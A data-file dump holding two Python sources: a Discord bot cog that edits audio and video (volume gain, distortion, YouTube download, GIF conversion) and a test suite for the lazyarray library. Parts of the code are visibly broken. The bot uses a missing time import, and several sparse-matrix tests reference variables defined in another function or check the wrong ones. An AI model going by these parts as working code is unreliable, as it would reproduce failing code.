metadata
dict | text
stringlengths 60
3.49M
|
---|---|
{
"source": "jpboxer/JPsScuffedDiscordBot",
"score": 2
} |
#### File: JPsScuffedDiscordBot/cogs/AV.py
```python
import os
import discord
from discord.ext import commands
import requests
import random
import numpy as np
from pydub import AudioSegment as audi
from moviepy.editor import *
from moviepy.video.io.ffmpeg_tools import ffmpeg_extract_subclip as cutr
import youtube_dl
audi.converter = "C:\\ffmpeg\\bin\\ffmpeg.exe"
audi.ffmpeg = "C:\\ffmpeg\\bin\\ffmpeg.exe"
audi.ffprobe ="C:\\ffmpeg\\bin\\ffprobe.exe"
if os.getcwd().find("cogs") > -1 :
os.chdir("..")
path = os.getcwd()
path+="\\tempstore"
class AV(commands.Cog):
def __init__(self, bot):
self.client = bot
@commands.Cog.listener()
async def on_ready(self):
print("AV cog loaded")
async def hwnt(ctx):
chnnl = ctx.message.channel
msgs = await chnnl.history(limit=10).flatten()
url = None
for x in msgs :
if len(x.attachments) > 0 :
url = x.attachments[0].url.lower()
if url[-3:] == "jpg" or url[-3:] == "png" :
return url
if x.content[-3:].lower() == "jpg" or x.content[-3:].lower() == "png" :
return x.content
async def ghwnt(ctx):
chnnl = ctx.message.channel
msgs = await chnnl.history(limit=10).flatten()
url = None
for x in msgs :
if len(x.attachments) > 0 :
url = x.attachments[0].url
if url[-3:] == "gif":
return url
if x.content[-3:] == "gif" :
return x.content
async def ahwnt(ctx):
chnnl = ctx.message.channel
msgs = await chnnl.history(limit=10).flatten()
url = None
for x in msgs :
if len(x.attachments) > 0 :
url = x.attachments[0].url
if url[-3:] == "mp3" or url[-3:] == "wav":
return url
if x.content[-3:] == "wav" or x.content[-3:] == "mp3":
return x.content
async def mhwnt(ctx):
chnnl = ctx.message.channel
msgs = await chnnl.history(limit=10).flatten()
url = None
for x in msgs :
if len(x.attachments) > 0 :
url = x.attachments[0].url
if url[-3:] == "mp4" or url[-3:] == "mov" or url[-4:] == "webm" :
return url
if x.content[-3:] == "mp4" or x.content[-3:] == "mov" or x.content[-4:] == "webm":
return x.content
def dwn(url, fln):
r = requests.get(url)
f = open(fln,"wb")
f.write(r.content)
f.close
@commands.command()
async def play(self,ctx):
os.chdir(path+"\\sounds")
url = await AV.ahwnt(ctx)
form = url[-3:]
AV.dwn(url,"base."+form)
if form == 'mp3' :
clip = audi.from_mp3("base."+form)
else :
clip = audi.from_wav("base."+form)
query = "base."+form
chnnl= ctx.author.voice.channel
if chnnl == None :
await ctx.send("JOIN A VOICE CHAT DUMBASS")
return
if ctx.voice_client is not None :
await ctx.voice_client.move_to(chnnl)
else :
await chnnl.connect()
source = discord.PCMVolumeTransformer(discord.FFmpegPCMAudio(query))
ctx.voice_client.play(source, after=lambda e: print('Player error: %s' % e) if e else None)
time.sleep(len(clip)/1000)
await ctx.voice_client.disconnect()
@commands.command()
async def gain(self,ctx,db=6):
os.chdir(path+"\\sounds")
url = await AV.ahwnt(ctx)
form = url[-3:]
AV.dwn(url,"base."+form)
if form == 'mp3' :
clip = audi.from_mp3("base."+form)
else :
clip = audi.from_wav("base."+form)
clip = clip.apply_gain(db)
clip.export("amp.mp3", format="mp3")
await ctx.send(file=discord.File('amp.mp3'))
@commands.command()
async def ytdown(self,ctx,url, quality="worst"):
try :
quality = quality.lower()
except :
ctx.send("thats not a word")
if quality == "best" :
ydl_opts = {
'format': 'best',
'outtmpl': 'del',
'noplaylist' : True,
}
elif quality == "worst" :
ydl_opts = {
'format': 'worst',
'outtmpl': 'del',
'noplaylist' : True,
}
else :
ydl_opts = {
'format': 'worst',
'outtmpl': 'del',
'noplaylist' : True,
}
os.chdir(path+"\\sounds")
with youtube_dl.YoutubeDL(ydl_opts) as ydl:
ydl.download([url])
files=os.listdir()
res = None
for x in files :
if x.find('del') > -1 :
res = x
try :
video = VideoFileClip(res)
video.write_videofile("base.mp4")
os.remove(res)
except :
await ctx.send("Error downloading the video")
try :
await ctx.send(file=discord.File('base.mp4'))
except:
await ctx.send("File to large")
@commands.command()
async def audiox(self,ctx):
os.chdir(path+"\\sounds")
url = await AV.mhwnt(ctx)
form = url[-3:]
AV.dwn(url,"base."+form)
video = VideoFileClip("base."+form)
audio = video.audio
audio.write_audiofile("result.mp3")
try :
await ctx.send(file=discord.File('result.mp3'))
except:
await ctx.send("File to large")
@commands.command()
async def vamp(self,ctx, db=12):
os.chdir(path+"\\sounds")
url = await AV.mhwnt(ctx)
form = url[-3:]
AV.dwn(url,"base."+form)
video = VideoFileClip("base."+form)
video = video.volumex(db/6)
video.write_videofile("res.mp4")
try :
await ctx.send(file=discord.File('res.mp4'))
except:
await ctx.send("File to large")
@commands.command()
async def pvamp(self,ctx):
os.chdir(path+"\\sounds")
url = await AV.mhwnt(ctx)
form = url[-3:]
AV.dwn(url,"base."+form)
video = VideoFileClip("base."+form)
subs = []
for x in range(1, int(video.duration*10)):
pos1 = (x-1)/10
pos2 = x/10
if x == int(video.duration*10) :
sub = video.subclip(t_start=pos2, t_end=video.duration)
else :
sub = video.subclip(t_start=pos1, t_end=pos2)
sub = sub.volumex(pos2*1.1)
subs.append(sub)
fclip = concatenate_videoclips(subs)
fclip.write_videofile("res.mp4")
try :
await ctx.send(file=discord.File('res.mp4'))
except:
await ctx.send("File to large")
@commands.command()
async def distort(self,ctx, ds=5, db=12):
import moviepy.video.fx.all as vfx
os.chdir(path+"\\sounds")
url = await AV.mhwnt(ctx)
form = url[-3:]
AV.dwn(url,"base."+form)
video = VideoFileClip("base."+form)
video = video.volumex(db/6)
video = vfx.colorx(video, int(ds))
video.write_videofile("res.mp4")
try :
await ctx.send(file=discord.File('res.mp4'))
except:
await ctx.send("File to large")
@commands.command()
async def pdistort(self,ctx, ds=5):
import moviepy.video.fx.all as vfx
os.chdir(path+"\\sounds")
url = await AV.mhwnt(ctx)
form = url[-3:]
AV.dwn(url,"base."+form)
video = VideoFileClip("base."+form)
leng = video.duration
seg = int(leng/10)
clips = []
for x in range(1,11) :
if x == 10 :
sub = video.subclip(t_start=(x-1)*seg, t_end=leng)
else :
sub = video.subclip(t_start=(x-1)*seg, t_end=seg*x)
sub = vfx.colorx(sub,x)
clips.append(sub)
fclip = concatenate_videoclips(clips)
fclip.write_videofile("res.mp4")
try :
await ctx.send(file=discord.File('res.mp4'))
except:
await ctx.send("File to large")
@commands.command()
async def vshrink(self,ctx, ds=5):
import moviepy.video.fx.all as vfx
os.chdir(path+"\\sounds")
url = await AV.mhwnt(ctx)
form = url[-3:]
AV.dwn(url,"base."+form)
video = VideoFileClip("base."+form)
w,h = video.size
w = int(w/2)
h = int(h/2)
video = vfx.resize(video, (w,h))
video.write_videofile("res.mp4")
try :
await ctx.send(file=discord.File('res.mp4'))
except:
await ctx.send("File to large")
@commands.command()
async def spedup(self,ctx, multi=12):
import moviepy.video.fx.all as vfx
os.chdir(path+"\\sounds")
url = await AV.mhwnt(ctx)
form = url[-3:]
AV.dwn(url,"base."+form)
video = VideoFileClip("base."+form)
video = vfx.speedx(video, multi)
video.write_videofile("res.mp4")
try :
await ctx.send(file=discord.File('res.mp4'))
except:
await ctx.send("File to large")
@commands.command()
async def vdownscale(self,ctx):
import moviepy.video.fx.all as vfx
os.chdir(path+"\\sounds")
url = await AV.mhwnt(ctx)
form = url[-3:]
AV.dwn(url,"base."+form)
video = VideoFileClip("base."+form)
audio = video.audio
audio.write_audiofile("temp.mp3")
clip = audi.from_mp3("temp.mp3")
clip = clip.set_frame_rate(24000)
clip.export("temp.mp3", bitrate="16k", format="mp3")
audio = AudioFileClip("temp.mp3")
video = video.set_audio(audio)
w,h = video.size
w = int(w/16)
h = int(h/16)
video = vfx.resize(video, (w,h))
#audio = audio.fx(resize, 0.125, method='bilinear')
w = int(w*16)
h = int(h*16)
video = vfx.resize(video, (w,h))
video.write_videofile("res.mp4")
try :
await ctx.send(file=discord.File('res.mp4'))
except:
await ctx.send("File to large")
@commands.command()
async def fhalf(self,ctx):
import moviepy.video.fx.all as vfx
os.chdir(path+"\\sounds")
url = await AV.mhwnt(ctx)
form = url[-3:]
AV.dwn(url,"base."+form)
video = VideoFileClip("base."+form)
leng = video.duration
mid = int(leng/2)
cutr("base."+form, 0, mid, targetname="res.mp4")
try :
await ctx.send(file=discord.File('res.mp4'))
except:
await ctx.send("File to large")
@commands.command()
async def pvdownscale(self,ctx):
import moviepy.video.fx.all as vfx
os.chdir(path+"\\sounds")
url = await AV.mhwnt(ctx)
form = url[-3:]
AV.dwn(url,"base."+form)
video = VideoFileClip("base."+form)
audio = video.audio
audio.write_audiofile("temp.mp3")
clip = audi.from_mp3("temp.mp3")
clip = clip.set_frame_rate(24000)
flag = True
bit = 32
seg = int(video.duration/6)
aclips = []
for x in range(1,7) :
clip.export("temp.mp3", bitrate=str(bit)+'k', format="mp3")
audio = AudioFileClip("temp.mp3")
if x == 6 :
taudio = audio.subclip((x)*seg, video.duration)
else :
taudio = audio.subclip((x-1)*seg, seg*x)
bit/=2
aclips.append(taudio)
clips = []
for x in range(1,7) :
if x == 6 :
print("fa")
tvideo = video.subclip((x)*seg, video.duration)
else :
tvideo = video.subclip((x-1)*seg, seg*x)
h,w=video.size
h /= int(2*x)
w /= int(2*x)
tvideo = vfx.resize(tvideo, (w,h))
h *= (2*x)
w *= (2*x)
tvideo = vfx.resize(tvideo, (w,h))
tvideo = tvideo.set_audio(aclips[x-1])
clips.append(tvideo)
fclip = concatenate_videoclips(clips)
fclip.write_videofile("res.mp4")
try :
await ctx.send(file=discord.File('res.mp4'))
except:
await ctx.send("File to large")
@commands.command()
async def bhalf(self,ctx):
import moviepy.video.fx.all as vfx
os.chdir(path+"\\sounds")
url = await AV.mhwnt(ctx)
form = url[-3:]
AV.dwn(url,"base."+form)
video = VideoFileClip("base."+form)
leng = video.duration
mid = int(leng/2)
cutr("base."+form, mid, leng-1, targetname="res.mp4")
try :
await ctx.send(file=discord.File('res.mp4'))
except:
await ctx.send("File to large")
@commands.command()
async def lframe(self,ctx):
import moviepy.video.fx.all as vfx
os.chdir(path+"\\sounds")
url = await AV.mhwnt(ctx)
form = url[-3:]
AV.dwn(url,"base."+form)
video = VideoFileClip("base."+form)
leng = video.duration
video.save_frame("res.png",t=leng-1,withmask=True)
try :
await ctx.send(file=discord.File('res.png'))
except:
await ctx.send("File to large")
@commands.command()
async def mp4gif(self,ctx, db=12):
os.chdir(path+"\\sounds")
url = await AV.mhwnt(ctx)
form = url[-3:]
AV.dwn(url,"base."+form)
video = VideoFileClip("base."+form)
video.write_gif("res.gif")
try :
await ctx.send(file=discord.File('res.gif'))
except:
await ctx.send("File to large")
@commands.command()
async def gifmp4(self,ctx) :
import moviepy.video.fx.all as vfx
os.chdir(path+"\\sounds")
url = await AV.ghwnt(ctx)
form = url[-3:]
AV.dwn(url,"base."+form)
video = VideoFileClip("base."+form)
url = await AV.ahwnt(ctx)
AV.dwn(url,"base.mp3")
audio = AudioFileClip("base.mp3")
clips = []
if video.duration > audio.duration :
clips.append(video.subclip(0, audio.duration))
else :
leng=audio.duration-video.duration
clips.append(video)
while leng >= video.duration :
clips.append(video)
leng -= video.duration
clips.append(video.subclip(0,leng))
video = concatenate_videoclips(clips)
video = video.set_audio(audio)
video.write_videofile("res.mp4")
try :
await ctx.send(file=discord.File('res.mp4'))
except:
await ctx.send("File to large")
def setup(bot):
bot.add_cog(AV(bot))
``` |
{
"source": "JPBrain9/lazyarray",
"score": 3
} |
#### File: lazyarray/test/test_lazyarray.py
```python
from lazyarray import larray, VectorizedIterable, sqrt, partial_shape
import numpy as np
from nose.tools import assert_raises, assert_equal, assert_not_equal
from nose import SkipTest
from numpy.testing import assert_array_equal, assert_array_almost_equal
import operator
from copy import deepcopy
from scipy.sparse import bsr_matrix, coo_matrix, csc_matrix, csr_matrix, dia_matrix, dok_matrix, lil_matrix
class MockRNG(VectorizedIterable):
def __init__(self, start, delta):
self.start = start
self.delta = delta
def next(self, n):
s = self.start
self.start += n * self.delta
return s + self.delta * np.arange(n)
# test larray
def test_create_with_int():
A = larray(3, shape=(5,))
assert A.shape == (5,)
assert A.evaluate(simplify=True) == 3
def test_create_with_int_and_dtype():
A = larray(3, shape=(5,), dtype=float)
assert A.shape == (5,)
assert A.evaluate(simplify=True) == 3
def test_create_with_float():
A = larray(3.0, shape=(5,))
assert A.shape == (5,)
assert A.evaluate(simplify=True) == 3.0
def test_create_with_list():
A = larray([1, 2, 3], shape=(3,))
assert A.shape == (3,)
assert_array_equal(A.evaluate(), np.array([1, 2, 3]))
def test_create_with_array():
A = larray(np.array([1, 2, 3]), shape=(3,))
assert A.shape == (3,)
assert_array_equal(A.evaluate(), np.array([1, 2, 3]))
def test_create_with_array_and_dtype():
A = larray(np.array([1, 2, 3]), shape=(3,), dtype=int)
assert A.shape == (3,)
assert_array_equal(A.evaluate(), np.array([1, 2, 3]))
def test_create_with_generator():
def plusone():
i = 0
while True:
yield i
i += 1
A = larray(plusone(), shape=(5, 11))
assert_array_equal(A.evaluate(),
np.arange(55).reshape((5, 11)))
def test_create_with_function1D():
A = larray(lambda i: 99 - i, shape=(3,))
assert_array_equal(A.evaluate(),
np.array([99, 98, 97]))
def test_create_with_function1D_and_dtype():
A = larray(lambda i: 99 - i, shape=(3,), dtype=float)
assert_array_equal(A.evaluate(),
np.array([99.0, 98.0, 97.0]))
def test_create_with_function2D():
A = larray(lambda i, j: 3 * j - 2 * i, shape=(2, 3))
assert_array_equal(A.evaluate(),
np.array([[0, 3, 6],
[-2, 1, 4]]))
def test_create_inconsistent():
assert_raises(ValueError, larray, [1, 2, 3], shape=4)
def test_create_with_string():
assert_raises(TypeError, larray, "123", shape=3)
def test_create_with_larray():
A = 3 + larray(lambda i: 99 - i, shape=(3,))
B = larray(A, shape=(3,), dtype=int)
assert_array_equal(B.evaluate(),
np.array([102, 101, 100]))
## For sparse matrices
def test_create_with_sparse_array():
row = np.array([0, 2, 2, 0, 1, 2])
col = np.array([0, 0, 1, 2, 2, 2])
data = np.array([1, 2, 3, 4, 5, 6])
bsr = larray(bsr_matrix((data, (row, col)), shape=(3, 3))) # For bsr_matrix
coo = larray(coo_matrix((data, (row, col)), shape=(3, 3))) # For coo_matrix
csc = larray(csc_matrix((data, (row, col)), shape=(3, 3))) # For csc_matrix
csr = larray(csr_matrix((data, (row, col)), shape=(3, 3))) # For csr_matrix
data_dia = np.array([[1, 2, 3, 4]]).repeat(3, axis=0) # For dia_matrix
offsets_dia = np.array([0, -1, 2]) # For dia_matrix
dia = larray(dia_matrix((data_dia, offsets_dia), shape=(4, 4))) # For dia_matrix
dok = larray(dok_matrix(((row, col)), shape=(3, 3))) # For dok_matrix
lil = larray(lil_matrix(data, shape=(3, 3))) # For lil_matrix
assert bsr.shape == (3, 3)
assert coo.shape == (3, 3)
assert csc.shape == (3, 3)
assert csr.shape == (3, 3)
assert dia.shape == (4, 4)
assert dok.shape == (2, 6)
assert lil.shape == (1, 6)
def test_evaluate_with_sparse_array():
assert_array_equal(bsr.evaluate(), bsr_matrix((data, (row, col))).toarray()) # For bsr_matrix
assert_array_equal(coo.evaluate(), coo_matrix((data, (row, col))).toarray()) # For coo_matrix
assert_array_equal(csc.evaluate(), csc_matrix((data, (row, col))).toarray()) # For csc_matrix
assert_array_equal(csr.evaluate(), csr_matrix((data, (row, col))).toarray()) # For csr_matrix
assert_array_equal(dia.evaluate(), dia_matrix((data_dia, (row, col))).toarray()) # For dia_matrix
assert_array_equal(dok.evaluate(), dok_matrix((data, (row, col))).toarray()) # For dok_matrix
assert_array_equal(lil.evaluate(), lil_matrix((data, (row, col))).toarray()) # For lil_matrix
def test_multiple_operations_with_sparse_array():
# For bsr_matrix
bsr0 = bsr /100.0
bsr1 = 0.2 + bsr0
assert_array_almost_equal(bsr0.evaluate(), np.array([[0.01, 0., 0.04], [0., 0., 0.05], [0.02, 0.03, 0.06]]))
assert_array_almost_equal(bsr0.evaluate(), np.array([[0.21, 0.2, 0.24], [0.2, 0.2, 0.25], [0.22, 0.23, 0.26]]))
# For coo_matrix
coo0 = coo /100.0
coo1 = 0.2 + coo0
assert_array_almost_equal(coo0.evaluate(), np.array([[0.01, 0., 0.04], [0., 0., 0.05], [0.02, 0.03, 0.06]]))
assert_array_almost_equal(coo0.evaluate(), np.array([[0.21, 0.2, 0.24], [0.2, 0.2, 0.25], [0.22, 0.23, 0.26]]))
# For csc_matrix
csc0 = csc /100.0
csc1 = 0.2 + csc0
assert_array_almost_equal(csc0.evaluate(), np.array([[0.01, 0., 0.04], [0., 0., 0.05], [0.02, 0.03, 0.06]]))
assert_array_almost_equal(csc0.evaluate(), np.array([[0.21, 0.2, 0.24], [0.2, 0.2, 0.25], [0.22, 0.23, 0.26]]))
# For csr_matrix
csr0 = csr /100.0
csr1 = 0.2 + csr0
assert_array_almost_equal(csc0.evaluate(), np.array([[0.01, 0., 0.04], [0., 0., 0.05], [0.02, 0.03, 0.06]]))
assert_array_almost_equal(csc0.evaluate(), np.array([[0.21, 0.2, 0.24], [0.2, 0.2, 0.25], [0.22, 0.23, 0.26]]))
# For dia_matrix
dia0 = dia /100.0
dia1 = 0.2 + dia0
assert_array_almost_equal(dia0.evaluate(), np.array([[0.01, 0.02, 0.03, 0.04]]))
assert_array_almost_equal(dia1.evaluate(), np.array([[0.21, 0.22, 0.23, 0.24]]))
# For dok_matrix
dok0 = dok /100.0
dok1 = 0.2 + dok0
assert_array_almost_equal(dok0.evaluate(), np.array([[0., 0.02, 0.02, 0., 0.01, 0.02], [0., 0., 0.01, 0.02, 0.02, 0.02]]))
assert_array_almost_equal(dok1.evaluate(), np.array([[0.2, 0.22, 0.22, 0.2, 0.21, 0.22], [0.2, 0.2, 0.21, 0.22, 0.22, 0.22]]))
# For lil_matrix
lil0 = lil /100.0
lil1 = 0.2 + lil0
assert_array_almost_equal(lil0.evaluate(), np.array([[0.01, 0.02, 0.03, 0.04, 0.05, 0.06]]))
assert_array_almost_equal(lil1.evaluate(), np.array([[0.21, 0.22, 0.23, 0.24, 0.25, 0.26]]))
def test_getitem_from_2D_sparse_array():
assert_raises(IndexError, bsr.__getitem__, (3, 0))
assert_raises(IndexError, coo.__getitem__, (3, 0))
assert_raises(IndexError, csc.__getitem__, (3, 0))
assert_raises(IndexError, csr.__getitem__, (3, 0))
assert_raises(IndexError, dia.__getitem__, (3, 0))
assert_raises(IndexError, dok.__getitem__, (3, 0))
assert_raises(IndexError, lil.__getitem__, (3, 0))
# def test_columnwise_iteration_with_flat_array():
# m = larray(5, shape=(4,3)) # 4 rows, 3 columns
# cols = [col for col in m.by_column()]
# assert_equal(cols, [5, 5, 5])
#
# def test_columnwise_iteration_with_structured_array():
# input = np.arange(12).reshape((4,3))
# m = larray(input, shape=(4,3)) # 4 rows, 3 columns
# cols = [col for col in m.by_column()]
# assert_array_equal(cols[0], input[:,0])
# assert_array_equal(cols[2], input[:,2])
#
# def test_columnwise_iteration_with_function():
# input = lambda i,j: 2*i + j
# m = larray(input, shape=(4,3))
# cols = [col for col in m.by_column()]
# assert_array_equal(cols[0], np.array([0, 2, 4, 6]))
# assert_array_equal(cols[1], np.array([1, 3, 5, 7]))
# assert_array_equal(cols[2], np.array([2, 4, 6, 8]))
#
# def test_columnwise_iteration_with_flat_array_and_mask():
# m = larray(5, shape=(4,3)) # 4 rows, 3 columns
# mask = np.array([True, False, True])
# cols = [col for col in m.by_column(mask=mask)]
# assert_equal(cols, [5, 5])
#
# def test_columnwise_iteration_with_structured_array_and_mask():
# input = np.arange(12).reshape((4,3))
# m = larray(input, shape=(4,3)) # 4 rows, 3 columns
# mask = np.array([False, True, True])
# cols = [col for col in m.by_column(mask=mask)]
# assert_array_equal(cols[0], input[:,1])
# assert_array_equal(cols[1], input[:,2])
def test_size_related_properties():
m1 = larray(1, shape=(9, 7))
m2 = larray(1, shape=(13,))
m3 = larray(1)
assert_equal(m1.nrows, 9)
assert_equal(m1.ncols, 7)
assert_equal(m1.size, 63)
assert_equal(m2.nrows, 13)
assert_equal(m2.ncols, 1)
assert_equal(m2.size, 13)
assert_raises(ValueError, lambda: m3.nrows)
assert_raises(ValueError, lambda: m3.ncols)
assert_raises(ValueError, lambda: m3.size)
def test_evaluate_with_flat_array():
m = larray(5, shape=(4, 3))
assert_array_equal(m.evaluate(), 5 * np.ones((4, 3)))
def test_evaluate_with_structured_array():
input = np.arange(12).reshape((4, 3))
m = larray(input, shape=(4, 3))
assert_array_equal(m.evaluate(), input)
def test_evaluate_with_functional_array():
input = lambda i, j: 2 * i + j
m = larray(input, shape=(4, 3))
assert_array_equal(m.evaluate(),
np.array([[0, 1, 2],
[2, 3, 4],
[4, 5, 6],
[6, 7, 8]]))
def test_evaluate_with_vectorized_iterable():
input = MockRNG(0, 1)
m = larray(input, shape=(7, 3))
assert_array_equal(m.evaluate(),
np.arange(21).reshape((7, 3)))
def test_evaluate_twice_with_vectorized_iterable():
input = MockRNG(0, 1)
m1 = larray(input, shape=(7, 3)) + 3
m2 = larray(input, shape=(7, 3)) + 17
assert_array_equal(m1.evaluate(),
np.arange(3, 24).reshape((7, 3)))
assert_array_equal(m2.evaluate(),
np.arange(38, 59).reshape((7, 3)))
def test_evaluate_structured_array_size_1_simplify():
m = larray([5.0], shape=(1,))
assert_equal(m.evaluate(simplify=True), 5.0)
n = larray([2.0], shape=(1,))
assert_equal((m/n).evaluate(simplify=True), 2.5)
def test_iadd_with_flat_array():
m = larray(5, shape=(4, 3))
m += 2
assert_array_equal(m.evaluate(), 7 * np.ones((4, 3)))
assert_equal(m.base_value, 5)
assert_equal(m.evaluate(simplify=True), 7)
def test_add_with_flat_array():
m0 = larray(5, shape=(4, 3))
m1 = m0 + 2
assert_equal(m1.evaluate(simplify=True), 7)
assert_equal(m0.evaluate(simplify=True), 5)
def test_lt_with_flat_array():
m0 = larray(5, shape=(4, 3))
m1 = m0 < 10
assert_equal(m1.evaluate(simplify=True), True)
assert_equal(m0.evaluate(simplify=True), 5)
def test_lt_with_structured_array():
input = np.arange(12).reshape((4, 3))
m0 = larray(input, shape=(4, 3))
m1 = m0 < 5
assert_array_equal(m1.evaluate(simplify=True), input < 5)
def test_structured_array_lt_array():
input = np.arange(12).reshape((4, 3))
m0 = larray(input, shape=(4, 3))
comparison = 5 * np.ones((4, 3))
m1 = m0 < comparison
assert_array_equal(m1.evaluate(simplify=True), input < comparison)
def test_rsub_with_structured_array():
m = larray(np.arange(12).reshape((4, 3)))
assert_array_equal((11 - m).evaluate(),
np.arange(11, -1, -1).reshape((4, 3)))
def test_inplace_mul_with_structured_array():
m = larray((3 * x for x in range(4)), shape=(4,))
m *= 7
assert_array_equal(m.evaluate(),
np.arange(0, 84, 21))
def test_abs_with_structured_array():
m = larray(lambda i, j: i - j, shape=(3, 4))
assert_array_equal(abs(m).evaluate(),
np.array([[0, 1, 2, 3],
[1, 0, 1, 2],
[2, 1, 0, 1]]))
def test_multiple_operations_with_structured_array():
input = np.arange(12).reshape((4, 3))
m0 = larray(input, shape=(4, 3))
m1 = (m0 + 2) < 5
m2 = (m0 < 5) + 2
assert_array_equal(m1.evaluate(simplify=True), (input + 2) < 5)
assert_array_equal(m2.evaluate(simplify=True), (input < 5) + 2)
assert_array_equal(m0.evaluate(simplify=True), input)
def test_multiple_operations_with_functional_array():
m = larray(lambda i: i, shape=(5,))
m0 = m / 100.0
m1 = 0.2 + m0
assert_array_almost_equal(m0.evaluate(), np.array([0.0, 0.01, 0.02, 0.03, 0.04]), decimal=12)
assert_array_almost_equal(m1.evaluate(), np.array([0.20, 0.21, 0.22, 0.23, 0.24]), decimal=12)
assert_equal(m1[0], 0.2)
def test_operations_combining_constant_and_structured_arrays():
m0 = larray(10, shape=(5,))
m1 = larray(np.arange(5))
m2 = m0 + m1
assert_array_almost_equal(m2.evaluate(), np.arange(10, 15))
def test_apply_function_to_constant_array():
f = lambda m: 2 * m + 3
m0 = larray(5, shape=(4, 3))
m1 = f(m0)
assert isinstance(m1, larray)
assert_equal(m1.evaluate(simplify=True), 13)
# the following tests the internals, not the behaviour
# it is just to check I understand what's going on
assert_equal(m1.operations, [(operator.mul, 2), (operator.add, 3)])
def test_apply_function_to_structured_array():
f = lambda m: 2 * m + 3
input = np.arange(12).reshape((4, 3))
m0 = larray(input, shape=(4, 3))
m1 = f(m0)
assert isinstance(m1, larray)
assert_array_equal(m1.evaluate(simplify=True), input * 2 + 3)
def test_apply_function_to_functional_array():
input = lambda i, j: 2 * i + j
m0 = larray(input, shape=(4, 3))
f = lambda m: 2 * m + 3
m1 = f(m0)
assert_array_equal(m1.evaluate(),
np.array([[3, 5, 7],
[7, 9, 11],
[11, 13, 15],
[15, 17, 19]]))
def test_add_two_constant_arrays():
m0 = larray(5, shape=(4, 3))
m1 = larray(7, shape=(4, 3))
m2 = m0 + m1
assert_equal(m2.evaluate(simplify=True), 12)
# the following tests the internals, not the behaviour
# it is just to check I understand what's going on
assert_equal(m2.base_value, m0.base_value)
assert_equal(m2.operations, [(operator.add, m1)])
def test_add_incommensurate_arrays():
m0 = larray(5, shape=(4, 3))
m1 = larray(7, shape=(5, 3))
assert_raises(ValueError, m0.__add__, m1)
def test_getitem_from_2D_constant_array():
m = larray(3, shape=(4, 3))
assert m[0, 0] == m[3, 2] == m[-1, 2] == m[-4, 2] == m[2, -3] == 3
assert_raises(IndexError, m.__getitem__, (4, 0))
assert_raises(IndexError, m.__getitem__, (2, -4))
def test_getitem_from_1D_constant_array():
m = larray(3, shape=(43,))
assert m[0] == m[42] == 3
def test_getitem__with_slice_from_constant_array():
m = larray(3, shape=(4, 3))
assert_array_equal(m[:3, 0],
np.array([3, 3, 3]))
def test_getitem__with_thinslice_from_constant_array():
m = larray(3, shape=(4, 3))
assert_equal(m[2:3, 0:1], 3)
def test_getitem__with_mask_from_constant_array():
m = larray(3, shape=(4, 3))
assert_array_equal(m[1, (0, 2)],
np.array([3, 3]))
def test_getitem_with_numpy_integers_from_2D_constant_array():
if not hasattr(np, "int64"):
raise SkipTest("test requires a 64-bit system")
m = larray(3, shape=(4, 3))
assert m[np.int64(0), np.int32(0)] == 3
def test_getslice_from_constant_array():
m = larray(3, shape=(4, 3))
assert_array_equal(m[:2],
np.array([[3, 3, 3],
[3, 3, 3]]))
def test_getslice_past_bounds_from_constant_array():
m = larray(3, shape=(5,))
assert_array_equal(m[2:10],
np.array([3, 3, 3]))
def test_getitem_from_structured_array():
m = larray(3 * np.ones((4, 3)), shape=(4, 3))
assert m[0, 0] == m[3, 2] == m[-1, 2] == m[-4, 2] == m[2, -3] == 3
assert_raises(IndexError, m.__getitem__, (4, 0))
assert_raises(IndexError, m.__getitem__, (2, -4))
def test_getitem_from_2D_functional_array():
m = larray(lambda i, j: 2 * i + j, shape=(6, 5))
assert_equal(m[5, 4], 14)
def test_getitem_from_1D_functional_array():
m = larray(lambda i: i ** 3, shape=(6,))
assert_equal(m[5], 125)
def test_getitem_from_3D_functional_array():
m = larray(lambda i, j, k: i + j + k, shape=(2, 3, 4))
assert_raises(NotImplementedError, m.__getitem__, (0, 1, 2))
def test_getitem_from_vectorized_iterable():
input = MockRNG(0, 1)
m = larray(input, shape=(7,))
m3 = m[3]
assert isinstance(m3, (int, np.integer))
assert_equal(m3, 0)
assert_equal(m[0], 1)
def test_getitem_with_slice_from_2D_functional_array():
m = larray(lambda i, j: 2 * i + j, shape=(6, 5))
assert_array_equal(m[2:5, 3:],
np.array([[7, 8],
[9, 10],
[11, 12]]))
def test_getitem_with_slice_from_2D_functional_array_2():
def test_function(i, j):
return i * i + 2 * i * j + 3
m = larray(test_function, shape=(3, 15))
assert_array_equal(m[:, 3:14:3],
np.fromfunction(test_function, shape=(3, 15))[:, 3:14:3])
def test_getitem_with_mask_from_2D_functional_array():
a = np.arange(30).reshape((6, 5))
m = larray(lambda i, j: 5 * i + j, shape=(6, 5))
assert_array_equal(a[[2, 3], [3, 4]],
np.array([13, 19]))
assert_array_equal(m[[2, 3], [3, 4]],
np.array([13, 19]))
def test_getitem_with_mask_from_1D_functional_array():
m = larray(lambda i: np.sqrt(i), shape=(10,))
assert_array_equal(m[[0, 1, 4, 9]],
np.array([0, 1, 2, 3]))
def test_getitem_with_boolean_mask_from_1D_functional_array():
m = larray(lambda i: np.sqrt(i), shape=(10,))
assert_array_equal(m[np.array([1, 1, 0, 0, 1, 0, 0, 0, 0, 1], dtype=bool)],
np.array([0, 1, 2, 3]))
def test_getslice_from_2D_functional_array():
m = larray(lambda i, j: 2 * i + j, shape=(6, 5))
assert_array_equal(m[1:3],
np.array([[2, 3, 4, 5, 6],
[4, 5, 6, 7, 8]]))
def test_getitem_from_iterator_array():
m = larray(iter([1, 2, 3]), shape=(3,))
assert_raises(NotImplementedError, m.__getitem__, 2)
def test_getitem_from_array_with_operations():
a1 = np.array([[1, 3, 5], [7, 9, 11]])
m1 = larray(a1)
f = lambda i, j: np.sqrt(i * i + j * j)
a2 = np.fromfunction(f, shape=(2, 3))
m2 = larray(f, shape=(2, 3))
a3 = 3 * a1 + a2
m3 = 3 * m1 + m2
assert_array_equal(a3[:, (0, 2)],
m3[:, (0, 2)])
def test_evaluate_with_invalid_base_value():
m = larray(range(5))
m.base_value = "foo"
assert_raises(ValueError, m.evaluate)
def test_partially_evaluate_with_invalid_base_value():
m = larray(range(5))
m.base_value = "foo"
assert_raises(ValueError, m._partially_evaluate, 3)
def test_check_bounds_with_invalid_address():
m = larray([[1, 3, 5], [7, 9, 11]])
assert_raises(TypeError, m.check_bounds, (object(), 1))
def test_check_bounds_with_invalid_address2():
m = larray([[1, 3, 5], [7, 9, 11]])
assert_raises(ValueError, m.check_bounds, ([], 1))
def test_partially_evaluate_constant_array_with_one_element():
m = larray(3, shape=(1,))
a = 3 * np.ones((1,))
m1 = larray(3, shape=(1, 1))
